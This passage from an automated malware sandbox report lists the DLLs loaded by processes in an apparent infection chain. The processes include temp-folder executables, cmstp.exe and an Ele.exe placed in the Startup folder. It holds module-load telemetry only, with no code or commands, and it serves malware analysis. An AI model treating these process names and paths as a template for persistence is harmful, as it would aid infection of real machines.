                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmcfg32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmlua.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: comsvcs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmstplua.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmlua.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: thumbcache.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rasapi32.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rasman.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: rtutils.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: taskschd.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: sxs.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpSection loaded: kernel.appcore.dll
